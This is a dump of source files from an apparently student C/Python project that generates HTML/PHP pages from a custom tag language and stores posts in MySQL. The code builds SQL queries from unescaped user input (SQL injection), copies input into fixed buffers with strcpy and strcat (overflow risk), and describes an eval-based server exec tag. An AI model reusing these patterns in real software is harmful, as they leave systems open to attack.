createButton(char* buttonTag);\n\n/**\n *\tcreateInput\n *\tcreates an text input tag-and-form\n *\tIN:\t\t\tinputTag\t\t- the input wpml tag\n *\tOUT:\t\tan html output tag\n *\tPOST:\t\tnone\n *\tERROR:\t\tinputTag is NULL\n */\nchar* createInput(char* inputTag);\n\n/**\n *\tcreateRadio\n *\tcreates an html radio button from a wpml config tag\n *\tIN:\t\t\tradiotag\t\t- the radio wpml tag\n *\tOUT:\t\ta new radio button html tag.\n *\tPOST:\t\tnone\n *\tERROR:\t\tradiotag is null\n */\nchar* createRadio(char* radioTag);\n\n/**\n *\tcreatePicture\n *\tcreates a picture html tag (actually <img>)\n *\tIN:\t\t\tpictureTag\t\t- the picture wpml tag.\n *\tOUT:\t\ta new picture (img) html tag\n *\tPOST:\t\tnone\n *\tERROR:\t\tpicturetag is null.\n */\nchar* createPicture(char* pictureTag);\n\n/**\n *\tcreateExec\n *\tcreates an executable tag, which when eval()'d by php can execute a \n *\tprogram.\n *\tIN:\t\t\texecTag\t\t\t- a new executable tag.\n *\tOUT:\t\ta new executable tag that allows you to server-execute\n *\t\t\t\t... 
something.\n *\tPOST:\t\tnone\n *\tERROR:\t\texectag is NULL.\n */\nchar* createExec(char* execTag);\n\n\n/*-------------------------- start of user-made tags ---------------------------*/\n\n/**\n *\tcreateDiv\n *\tcreates a div (opening) tag.\n *\tIN:\t\t\tdivTag\t\t\t- a wpml f tag\n *\tOUT:\t\tproduces a div tag.\n *\tPOST:\t\tnone\n *\tERROR:\t\tdivTag is null\n */\nchar* createDiv(char* divTag);\n\n/**\n *\tcreateSelector\n *\tcreates a selector tag that has all the possible streams in the messages\n *\tfolder.\n *\tIN:\t\t\tselTag\t\t\t- the selector tag (wpml .s())\n *\tOUT:\t\ta selector html tag with all the options\n *\tPOST:\t\tnone\n *\tERROR:\t\tseltag is null.\n */\nchar* createSelector(char* selTag);\n\n/**\n *\tcreateDependency\n *\tcreates a hidden input field that allows thr propogation of values between\n *\tseveral pages without re-submission of the form or page.\n *\tIN:\t\t\tdepTag\t\t\t- a wpml dependency tag\n *\tOUT:\t\ta new dependency tag which can produce a hidden field\n *\tPOST:\t\tnone\n *\tERROR:\t\tdepTag is NULL.\n */\nchar* createDependency(char* depTag);\n\n/**\n *\tcreateAdd\n *\tcreates php that produces an addauthor component.\n *\tIN:\t\t\taddTag\t\t\t- the wpml .a() tag.\n *\tOUT:\t\ta php script that can produce an addauthor component\n *\tPOST:\t\tnone\n *\tERROR:\t\tnone\n */\nchar* createAdd(char* addTag);\n\n/**\n *\tcreateView\n *\tcreates a php script that generates a view interface.\n *\tIN:\t\t\ta .v() tag.\n *\tOUT:\t\ta new php script that creates a view interface.\n *\tPOST:\t\tnone\n *\tERROR:\t\tmalloc fails, otherwise none.\n */\nchar* createView(char* viewTag);\n\n/**\n *\tcreatePost\n *\tcreates a php script that generates a view tag.\n *\tIN:\t\t\tpostTag\t\t\t- a .p() tag.\n *\tOUT:\t\ta php script that generates a post interface.\n *\tPOST:\t\tnone\n *\tERROR:\t\tmalloc fails.\n */\nchar* createPost(char* postTag);\n\n#endif\n" }, { "alpha_fraction": 0.6277915835380554, "alphanum_fraction": 
0.6501240730285645, "avg_line_length": 15.119999885559082, "blob_id": "fa204158c6df89705e7d4852e4f85828ed94a837", "content_id": "c98f1fc8da32219cd537be61d34838d68a834ff1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 403, "license_type": "no_license", "max_line_length": 133, "num_lines": 25, "path": "/create.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "#include \"generation.h\"\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\n#define ERROR_NO_ARGS \"<html><body><h1>Whoops!<br><h3>Something went wrong.<br>No page name was given to be generated!</body></html>\"\n\nint main(int argc, char** argv)\n{\n\tchar fname[512];\n\n\tif(argc < 2)\n\t{\n\t\tputs(ERROR_NO_ARGS);\n\t\treturn -1;\n\t}\n\telse\n\t{\n\t\tstrcpy(fname, argv[1]);\n\t}\n\n\tgeneratePage(fname);\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.6271186470985413, "alphanum_fraction": 0.642906904220581, "avg_line_length": 16.720165252685547, "blob_id": "3d2a605d95d81506bb3f090f58a0a64e2653409b", "content_id": "83b337493c6d7ccfde7373cd5536fa8185052163", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 4307, "license_type": "no_license", "max_line_length": 130, "num_lines": 243, "path": "/dbutils.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "\n#include \"dbutils.h\"\n#include \"vector.h\"\n\n#include <mysql/mysql.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\n\nint mysql_startConnect(MYSQL* sql)\n{\n\tmysql_init(sql);\n\n\tmysql_options(sql, MYSQL_READ_DEFAULT_GROUP, \"users\");\n\tif(!mysql_real_connect(sql, HOSTNAME, USERNAME, PASSWORD, DATABASE, 0, NULL, 0))\n\t{\n\t\treturn -1;\n\t}\n\n\treturn 0;\n}\n\n\nint mysql_make(MYSQL* sql)\n{\n\tint result;\n\n\tresult = mysql_query(sql, \"create table users (username varchar(64), stream varchar(32), lastread integer(5))\");\n\tresult += mysql_query(sql, \"create 
table streams (stream varchar(32))\");\n\tresult += mysql_query(sql, \"create table posts (stream varchar(32), username varchar(64), pdate char(14), post varchar(10000))\");\n\n\treturn result;\n}\n\n\nint mysql_clear(MYSQL* sql)\n{\n\tint result;\n\n\tresult = mysql_query(sql, \"truncate table users\");\n\tresult += mysql_query(sql, \"truncate table posts\");\n\tresult += mysql_query(sql, \"truncate table streams\");\n\n\treturn result;\n}\n\nint mysql_reset(MYSQL* sql)\n{\n\tint result;\n\n\tresult = mysql_query(sql, \"drop table users\");\n\tresult += mysql_query(sql, \"drop table posts\");\n\tresult += mysql_query(sql, \"drop table streams\");\n\n\treturn result;\n}\n\nint mysql_posts(MYSQL* sql)\n{\n\tMYSQL_RES* result;\n\tMYSQL_ROW row;\n\n\tmysql_query(sql, \"select post from posts order by pdate\");\n\n\tresult = mysql_store_result(sql);\n\tif(!result)\n\t{\n\t\treturn -1;\n\t}\n\n\twhile((row = mysql_fetch_row(result)))\n\t{\n\t\tprintf(\"%s\\n\\n\", row[0]);\n\t}\n\n\treturn 0;\n}\n\nint mysql_users(MYSQL* sql)\n{\n\tMYSQL_RES* result;\n\tMYSQL_ROW row;\n\n\tmysql_query(sql, \"select distinct username from users\");\n\n\tresult = mysql_store_result(sql);\n\tif(!result)\n\t{\n\t\treturn -1;\n\t}\n\n\twhile((row = mysql_fetch_row(result)))\n\t{\n\t\tprintf(\"%s\\n\", row[0]);\n\t}\n\n\treturn 0;\n}\n\nint mysql_streams(MYSQL* sql)\n{\n\tMYSQL_RES* result;\n\tMYSQL_ROW row;\n\n\tmysql_query(sql, \"select distinct stream from users\");\n\n\tresult = mysql_store_result(sql);\n\tif(!result)\n\t{\n\t\treturn -1;\n\t}\n\n\twhile((row = mysql_fetch_row(result)))\n\t{\n\t\tprintf(\"%s\\n\", row[0]);\n\t}\n\n\treturn 0;\n}\n\n/*-----------------------------------------------------------------------*/\n\nint getLastRead(char* username, char* stream, MYSQL* sql)\n{\n\tchar query[256];\n\tMYSQL_RES* result;\n\tMYSQL_ROW row;\n\n\tquery[0] = '\\0';\n\n\tsprintf(query, \"select lastRead from users where username='%s' and stream='%s'\", username, 
stream);\n\tmysql_query(sql, query);\n\n\tresult = mysql_store_result(sql);\n\t\n\trow = mysql_fetch_row(result);\n\n\treturn atoi(row[0]);\n}\n\nint setLastRead(char* username, char* stream, int n, MYSQL* sql)\n{\n\tint lastRead;\n\tchar query[256];\n\n\tlastRead = getLastRead(username, stream, sql);\n\tif(n <= lastRead)\n\t{\n\t\treturn 1;\n\t}\n\n\tsprintf(query, \"update users set lastread='%d' where users.stream='%s' and users.username='%s'\", n, stream, username);\n\n\tmysql_query(sql, query);\n\t\n\treturn 0;\n}\n\nint numposts(char* stream, MYSQL* sql)\n{\n\tchar query[256];\n\tMYSQL_RES* result;\n\n\tif(strcmp(stream, \"all\") == 0)\n\t{\n\t\tsprintf(query, \"select * from posts\");\n\t}\n\telse\n\t{\n\t\tsprintf(query, \"select * from posts where stream='%s'\", stream);\n\t}\n\n\tmysql_query(sql, query);\n\tresult = mysql_store_result(sql);\n\n\treturn mysql_num_rows(result);\n}\n\nint getPostN(char* username, char* stream, char* order, int n, MYSQL* sql)\n{\n\tint i;\n\tchar query[256];\n\tMYSQL_RES* result;\n\tMYSQL_ROW row;\n\n\tquery[0] = '\\0';\n\n\tif(strcmp(stream, \"all\") == 0)\n\t{\n\t\tsprintf(query, \"select post from posts order by %s\", order);\n\t\tmysql_query(sql, query);\n\t}\n\telse\n\t{\n\t\tsprintf(query, \"select post from posts where stream='%s' order by %s\", stream, order);\n\t\tmysql_query(sql, query);\n\t}\n\n\tresult = mysql_store_result(sql);\n\n\tfor(i = 0; i < n; i++)\n\t{\n\t\trow = mysql_fetch_row(result);\n\t}\n\n\trow = mysql_fetch_row(result);\n\n\t/* this is the correct row, and also the post segment. 
*/\n\tputs(row[0]);\n\tif(strcmp(stream, \"all\") != 0)\n\t{\n\t\tsetLastRead(username, stream, n, sql);\n\t}\n\n\treturn 0;\n}\n\nint getStreams(char* username, MYSQL* sql)\n{\n\tchar allStreams[512];\n\tchar query[256];\n\tMYSQL_RES* result;\n\tMYSQL_ROW row;\n\n\tallStreams[0] = '\\0';\n\n\tsprintf(query, \"select distinct stream from users\");\n\n\tmysql_query(sql, query);\n\n\tresult = mysql_store_result(sql);\n\n\twhile((row = mysql_fetch_row(result)))\n\t{\n\t\tstrcat(allStreams, row[0]);\n\t\tstrcat(allStreams, \",\");\n\t}\n\tallStreams[strlen(allStreams) - 1] = '\\0';\n\n\tputs(allStreams);\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.5616438388824463, "alphanum_fraction": 0.5821917653083801, "avg_line_length": 15.941176414489746, "blob_id": "ffd879ddfe18c9e499b4b7119fe4f79964e2223e", "content_id": "4891a2c776596768715fe2acbd7312b156035010", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 292, "license_type": "no_license", "max_line_length": 59, "num_lines": 17, "path": "/view.py", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n\nimport sys\nfrom sys import *\nimport os\nfrom subprocess import call\n\n\nif __name__ == \"__main__\":\n\n username = argv[1]\n stream = argv[2]\n index = argv[3]\n order = argv[4]\n command = argv[5]\n \n call([\"./db\", command, username, stream, index, order]) \n" }, { "alpha_fraction": 0.6909794211387634, "alphanum_fraction": 0.6936041116714478, "avg_line_length": 34.485294342041016, "blob_id": "ebe2afad279454e54c3a2cfad4e5cf4ea0f220c0", "content_id": "5f8f76fce64a3155c92a5b1eced3450120bd2c7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 7239, "license_type": "no_license", "max_line_length": 94, "num_lines": 204, "path": "/classToStruct.h", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n 
*\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n *\tThis file contains functions that are designed to operate on class-to-\n *\tstruct situations in a cc file, where the desided outcome is to produce\n *\ta working c file.\n *\n *\tThese functions aid in that transition.\n */\n#ifndef __GSOVERNIGO_CLASSTOSTRUCT_H__\n#define __GSOVERNIGO_CLASSTOSTRUCT_H__\n\n#include\"vector.h\"\n\n/**\n *\tmangle\n *\tthis function mangles the names of functions, so that they can be used as\n *\tfunction pointers in a struct.\n *\tIN:\t\t\tclassName\t\t\t- the name of the class that contains the\n *\t\t\t\t\t\t\t\t\t member functionName function.\n *\t\t\t\tfunctionName\t\t- the name of the function to be mangled.\n *\t\t\t\t\t\t\t\t\t the function name should not contain\n *\t\t\t\t\t\t\t\t\t the return type.\n *\t\t\t\targs\t\t\t\t- the args string, which contains all the\n *\t\t\t\t\t\t\t\t\t args terms.\n *\tOUT:\t\ta mangled, malloced name that can be used as a new function\n *\t\t\t\tpointer name. 
The new name shall conform to:\n *\n *\t\t\t\tclass math\n *\t\t\t\t{\n *\t\t\t\t\tint add(int a, int b)\n *\t\t\t\t\t{\n *\t\t\t\t\t\treturn a + b;\n *\t\t\t\t\t}\n *\t\t\t\t}\n *\n *\t\t\t\tbecomes:\n *\n *\t\t\t\tstruct math\n *\t\t\t\t{\n *\t\t\t\t\tint (*mathaddii)(int a, int b);\n *\t\t\t\t}\n *\n *\t\t\t\tint mathaddii(int a, int b)\n *\t\t\t\t{\n *\t\t\t\t\treturn a + b;\n *\t\t\t\t}\n *\tPOST:\t\ta new malloced name has been returned, ensure it is freed.\n *\tERROR:\t\tif malloc fails, or either of the two strings passed in are null\n */\nchar* mangle(char* className, char* functionName, char* args);\n\n/**\n * \treplaceClass\n * \treplaces the word class in the program with struct.\n * \tIN:\t\t\tprogram\t\t\t- the program struct that we will be modifying.\n * \tOUT:\t\tnumReplaced\t\t- the number of items we replaced in the program\n * \tPOST:\t\tall instances of the string \"class\" will be replaced by \"struct\"\n * \tERROR:\t\tif program is null, -1 will be returned for numReplaced.\n */\nint replaceClass(Vector* tokens);\n\n/**\n * \taddSelfReferences\n * \tadds a \"this->\" pointer to all class members that are located in the member\n * \tfunctions in the program.\n * \tIN:\t\t\ttokens\t\t\t- the tokens vector that holds the program\n * \tOUT:\t\tthe number of \"this->\" pointers entered into the program\n *\tPOST:\t\tthis-> has been added to class variables in member functions.\n *\tERROR:\t\ttokens is null\n */\nint addSelfReferences(Vector* tokens);\n\n/**\n * distributeThis\n * \tDistributes the various \"this->\" or \"struct <sname> * this\" tokens that are\n * \tneeded to create a self reference for member functions which have been moved.\n * \tIN:\t\t\ttokens\t\t\t- the program tokens in a vector\n * \t\t\t\tclassName\t\t- the class name we are operating on.\n * \t\t\t\tclassStart\t\t- the start of the class body\n * \t\t\t\tclassStop\t\t- the stop position of the class.\n * \tOUT:\t\t0 on success, error code on failure.\n * \tPOST:\t\tself 
references have been added to this particular class.\n *\n */\nint distributeThis(Vector* tokens, char* className, int classStart, int classStop);\n\n/**\n *\tgetParams\n *\tgets the parameters in the function definition\n *\tIN:\t\t\ttokens\t\t\t- the tokens of the program.\n *\t\t\t\tclassStart\t\t- the starting index of the class.\n *\tOUT:\t\ta vector, containing the parameter names for the function.\n *\tPOST:\t\ta vector has been returned to the caller, so you better use it.\n *\tERROR:\t\ttokens is null, or classStart is NOT a class start...\n */\nVector* getParams(Vector* tokens, int classStart);\n\n/**\n *\taddThisArg\n *\tadds the \"this\" argument to functions that were relocated outside of their\n *\toriginal classes, to allow access to the current calling instance of the struct.\n *\tIN:\t\t\ttokens\t\t\t- the tokens of the program, stored in a vector.\n * \t\t\tclassName\t\t- the class name of the function, in a string\n *\t\t\t\tfStart\t\t\t- the starting point of the function\n *\t\t\t\tbStart\t\t\t- the start of the function body (end of head)\n *\tOUT:\t\treturns 0 on success.\n *\tPOST:\t\tthis has been added to the function parameters defined by fstart\n *\t\t\t\tand bstop\n *\tERROR:\t\tany are null/invalid indexes\n */\nint addThisArg(Vector* tokens, char* className, int fStart, int bStart);\n\n/**\n *\taddThisRef\n *\tadds 'this' references to the functions, so that class variables can be\n *\taccessed from other functions.\n *\tIN:\t\t\ttokens\t\t\t- the tokens of the program\n *\t\t\t\tclassVariables\t- a vector of the class variables.\n *\t\t\t\tparams\t\t\t- the function parameters.\n *\t\t\t\tfstart\t\t\t- the starting index of the function.\n *\t\t\t\tfstop\t\t\t- the stopping index of the function.\n *\tOUT:\t\treturns the number of substitutions that occurred in the class.\n *\tPOST:\t\tthis-> has been added to all classVariables occurring in tokens.\n */\nint addThisRef(Vector* tokens, Vector* classVariables, Vector* params, int 
fstart, int fstop);\n\n/**\n *\tmangleAllMembers\n *\tmangles the names of all member function calls in all classes in the program.\n *\tIN:\t\t\ttokens\t\t\t- the vector of tokens in the program.\n *\tOUT:\t\t0 on success.\n *\tPOST:\t\tall member functions have been mangled.\n *\tERROR:\t\ttokens is NULL.\n */\nint mangleAllMembers(Vector* tokens);\n\n/**\n *\tmigrateFunctions\n *\tmoves the functions found in in classes out into program scope\n *\tIN:\t\t\ttokens\t\t\t- the vector containing the program tokens.\n *\tOUT:\t\tvoid\n *\tPOST:\t\tthe functions found in classes in tokens are moved above main.\n *\tERROR:\t\ttokens is NULL\n */\nvoid migrateFunctions(Vector* tokens);\n\n/**\n * \tcreateAllConstructors\n *\tcreates all the constructors for all classes, inserting the above main()\n *\tIN:\t\t\ttokens\t\t\t- the tokens of the program, held in a vector.\n *\tOUT:\t\t0 on success, error code (positive or negative) on failure\n *\tPOST:\t\tseveral tokens have been inserted above main, which represent\n *\t\t\t\tconstructors for the structs that we have created.\n *\tERROR:\t\ttokens is null\n */\nint createAllConstructors(Vector* tokens);\n\n/**\n * \tcreateAllConstructors\n * \tcreates, for all classes present in the file, a constructor that assigns\n * \ttheir function pointer member variables to the memory addresses of their\n * \tdeclared counterparts now located in program scope outside the callers.\n * \tIN:\t\t\ttokens\t\t\t- the tokens vector that holds the program\n * \t \t\tpos\t\t\t\t- the position of the class name declaration\n *\tOUT:\t\ta char* that represents a formatted constructor which will\n *\t\t\t\tpopulate the function pointer member variables in the class.\n *\tPOST:\t\ta char* has been returned, and should be inserted into a class.\n *\tERROR:\t\tpos is invalid; tokens in null.\n */\nchar* makeConstructor(Vector* tokens, int pos);\n\n/**\n *\tplaceConstructors\n *\tplaces constructors following all declarations in outer functions.\n 
*\tIN:\t\t\ttokens\t\t\t- the tokens of the program held in a vector.\n */\nint placeConstructors(Vector* tokens);\n\n/**\n *\tfixOuterFunctions\n *\tcorrects function calls in non-member functions, allowing the migrated\n *\tfunctions to be linked successfully with their actual calls.\n *\tIN:\t\t\ttokens\t\t\t- the tokens of the program held in a vector.\n *\tOUT:\t\t\n */\nint fixOuterFunctions(Vector* tokens);\n\n/**\n *\tmodifyFunctionCall\n *\tmodifies a function call, causing it to conform to its calling context\n *\tIN:\t\t\ttokens\t\t\t- the tokens of the program held in a vector.\n *\t\t\t\tpos\t\t\t\t- the position we are starting at.\n *\tOUT:\t\t0 on success.\n *\tPOST:\t\ttokens->contents[pos] has been mangled to fit its calling.\n *\tERROR:\t\ttokens is null, or pos does not point to a function call.\n */\nint modifyFunctionCall(Vector* tokens, int pos);\n\n#endif\n" }, { "alpha_fraction": 0.569455623626709, "alphanum_fraction": 0.5862796306610107, "avg_line_length": 18.891109466552734, "blob_id": "006978cccf770c61b9295329bdf76c03fe345aed", "content_id": "936519367cb66a0476de4509827ac15d9768043e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 19912, "license_type": "no_license", "max_line_length": 222, "num_lines": 1001, "path": "/tags.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "\n#include \"tags.h\"\n#include \"generation.h\"\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <dirent.h>\n#include <sys/types.h>\n\nchar* createText(char* textTag)\n{\n\tint i;\n\n\tchar** attributes;\n\tchar* finalTag;\n\t\n\tchar tagText[2048];\n\tchar tagArgs[1024];\n\n\ti = 0;\n\ttagArgs[0] = '\\0';\n\ttagText[0] = '\\0';\n\n\tif(textTag == NULL)\n\t{\n\t\treturn NULL;\n\t}\n\n\t/* gets the tag attributes from the tag. 
*/\n\tattributes = getArgs(textTag);\n\n\tif(attributes == NULL)\n\t{\n\t\tstrcpy(tagText, \"Default Text\");\n\t}\n\telse\n\t{\n\t\twhile(attributes[i] != NULL)\n\t\t{\n\t\t\t/* checks for the text attribute. If it is not present, then file is the attribute. */\n\t\t\tif(strncmp(\"text\", attributes[i], 4) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\n\t\t\t\tstrcpy(tagText, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\t/* the only other tag that can be here is the \"file\" attribute. */\n\t\t\telse if(strncmp(\"file\", attributes[i], 4) == 0)\n\t\t\t{\n\t\t\t\tFILE* inFile;\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\n\t\t\t\tinFile = fopen(value, \"r\");\n\t\t\t\tif(inFile == NULL)\n\t\t\t\t{\n\t\t\t\t\t/* establishes the default text, allowing the file to not exist safely. */\n\t\t\t\t\tstrcpy(tagText, \"Default Text\");\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tchar buffer[256];\n\t\t\t\t\tchar tagBuffer[2048];\n\n\t\t\t\t\ttagBuffer[0] = '\\0';\n\n\t\t\t\t\t/* get all the text from the file. */\n\t\t\t\t\twhile(fgets(buffer, 255, inFile) != NULL)\n\t\t\t\t\t{\n\t\t\t\t\t\tstrcat(tagBuffer, buffer);\n\t\t\t\t\t}\n\n\t\t\t\t\t/* copy the text into the tag. remember to return it. */\n\t\t\t\t\tstrcpy(tagText, tagBuffer);\n\n\t\t\t\t\tfclose(inFile);\n\t\t\t\t}\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\t/* this is the \"default\" case. 
*/\n\t\t\telse\n\t\t\t{\n\t\t\t\tstrcat(tagArgs, \" \");\n\t\t\t\tstrcat(tagArgs, attributes[i]);\n\t\t\t}\n\n\t\t\tfree(attributes[i]);\n\t\t\ti++;\n\t\t}\n\t\tfree(attributes);\n\t}\n\n\tfinalTag = malloc(sizeof(char) * (strlen(tagText) + strlen(tagArgs) + 1));\n\tfinalTag[0] = '\\0';\n\n\tstrcat(finalTag, tagText);\n\n\treturn finalTag;\n}\n\n\nchar* createHeader(char* headTag)\n{\n\tint i;\n\n\tchar tagArgs[1024];\n\tchar headerText[512];\n\tchar size[2];\n\n\tchar* finalTag;\n\tchar** attributes;\n\n\ti = 0;\n\n\ttagArgs[0] = '\\0';\n\theaderText[0] = '\\0';\n\tsize[0] = '\\0';\n\n\t/* gets the arguments for this tag. */\n\tattributes = getArgs(headTag);\n\n\tif(attributes != NULL)\n\t{\n\t\twhile(attributes[i] != NULL)\n\t\t{\n\n\t\t\t/* if we have found the text attribute */\n\t\t\tif(strncmp(attributes[i], \"text\", 4) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcat(headerText, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\t/* the only other tag is size. */\n\t\t\telse if(strncmp(attributes[i], \"size\", 4) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(size, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t/* this can be used to add css elements to the tags. */\n\t\t\t\tstrcat(tagArgs, \" \");\n\t\t\t\tstrcat(tagArgs, attributes[i]);\n\t\t\t}\n\n\t\t\tfree(attributes[i]);\n\t\t\ti++;\n\t\t}\n\t\tfree(attributes);\n\t}\n\n\t/* if the size has not been set. */\n\tif(strlen(size) == 0)\n\t{\n\t\tstrcpy(size, \"3\");\n\t}\n\n\t/* similar; if the header text has not been set, we need to set it. */\n\tif(strlen(headerText) == 0)\n\t{\n\t\tstrcpy(headerText, \"HEADER\");\n\t}\n\n\t/* add 9 extra chars, and a null terminator. */\n\tfinalTag = malloc(sizeof(char) * (strlen(headerText) + strlen(tagArgs) + 10));\n\tif(finalTag == NULL)\n\t{\n\t\treturn NULL;\n\t}\n\n\tfinalTag[0] = '\\0';\n\n\t/* add all the components to the final tag. 
*/\n\tstrcat(finalTag, \"<h\");\n\tstrcat(finalTag, size);\n\tstrcat(finalTag, tagArgs);\n\tstrcat(finalTag, \">\");\n\tstrcat(finalTag, headerText);\n\tstrcat(finalTag, \"</h\");\n\tstrcat(finalTag, size);\n\tstrcat(finalTag, \">\");\n\n\treturn finalTag;\n}\n\n\nchar* createLink(char* linkTag)\n{\n\tint i;\n\n\tchar tagArgs[1024];\n\tchar linkText[512];\n\tchar pageLink[512];\n\n\tchar* finalTag;\n\tchar** attributes;\n\n\ti = 0;\n\n\ttagArgs[0] = '\\0';\n\tlinkText[0] = '\\0';\n\n\t/* gets the arguments for this tag. */\n\tattributes = getArgs(linkTag);\n\n\tif(attributes != NULL)\n\t{\n\t\twhile(attributes[i] != NULL)\n\t\t{\n\t\t\t/* if we have found the text attribute */\n\t\t\tif(strncmp(attributes[i], \"text\", 4) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(linkText, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\t/* the only other tag is link. */\n\t\t\telse if(strncmp(attributes[i], \"link\", 4) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(pageLink, \"\\\"\");\n\t\t\t\tstrcat(pageLink, value);\n\t\t\t\tstrcat(pageLink, \"\\\"\");\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t/* this can be used to add css elements to the tags. */\n\t\t\t\tstrcat(tagArgs, \" \");\n\t\t\t\tstrcat(tagArgs, attributes[i]);\n\t\t\t}\n\t\t\tfree(attributes[i]);\n\t\t\t\n\t\t\ti++;\n\t\t}\n\t\tfree(attributes);\n\t}\n\n\t/* similar; if the header text has not been set, we need to set it. */\n\tif(strlen(linkText) == 0)\n\t{\n\t\tstrcpy(linkText, \"\\\"Link\\\"\");\n\t}\n\tif(strlen(pageLink) == 0)\n\t{\n\t\tstrcpy(pageLink, \"url\");\n\t}\n\n\t/* add 9 extra chars, and a null terminator. */\n\tfinalTag = malloc(sizeof(char) * (strlen(linkText) + strlen(pageLink) + strlen(tagArgs) + strlen(\"<a href=><p></p></a>\") + 1));\n\n\tif(finalTag == NULL)\n\t{\n\t\treturn NULL;\n\t}\n\n\tfinalTag[0] = '\\0';\n\n\t/* add all the components to the final tag. 
*/\n\tstrcat(finalTag, \"<a href=\");\n\tstrcat(finalTag, pageLink);\n\tstrcat(finalTag, \">\");\n\tstrcat(finalTag, \"<p\");\n\tstrcat(finalTag, tagArgs);\n\tstrcat(finalTag, \">\");\n\tstrcat(finalTag, linkText);\n\tstrcat(finalTag, \"</p>\");\n\tstrcat(finalTag, \"</a>\");\n\n\treturn finalTag;\n}\n\n\nchar* createButton(char* buttonTag)\n{\n\tint i;\n\n\tchar tagArgs[1024];\n\tchar buttonName[512];\n\tchar buttonLink[512];\n\tchar buttonText[512];\n\n\tchar* finalTag;\n\tchar** attributes;\n\n\ti = 0;\n\n\ttagArgs[0] = '\\0';\n\tbuttonName[0] = '\\0';\n\tbuttonLink[0] = '\\0';\n\tbuttonText[0] = '\\0';\n\n\t/* gets the arguments for this tag. */\n\tattributes = getArgs(buttonTag);\n\n\tif(attributes != NULL)\n\t{\n\t\twhile(attributes[i] != NULL)\n\t\t{\n\t\t\tif(strncmp(\"name\", attributes[i], 4) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(buttonName, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse if(strncmp(\"link\", attributes[i], 4) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(buttonLink, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse if(strncmp(\"text\", attributes[i], 4) == 0)\n\t\t\t{\n\t\t\t\tchar* value;\n\n\t\t\t\tvalue = getValue(attributes[i]);\n\t\t\t\tstrcpy(buttonText, value);\n\n\t\t\t\tfree(value);\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tstrcat(tagArgs, \" \");\n\t\t\t\tstrcat(tagArgs, attributes[i]);\n\t\t\t}\n\n\t\t\tfree(attributes[i]);\n\t\t\ti++;\n\t\t}\n\n\t\tfree(attributes);\n\t}\n\t\n\tfinalTag = malloc(sizeof(char) * (strlen(tagArgs) + strlen(buttonName) + strlen(buttonLink) + strlen(buttonText) + strlen(\"<form method=\\\"post\\\" action=\\\"\\\"><button type=\\\"submit\\\" name=\\\"\\\">Enter</button></form>\") + 1));\n\tfinalTag[0] = '\\0';\n\n\tstrcat(finalTag, \"<form method=\\\"post\\\" action=\\\"\");\n\tstrcat(finalTag, buttonLink);\n\tstrcat(finalTag, \"\\\" \");\n\tstrcat(finalTag, 
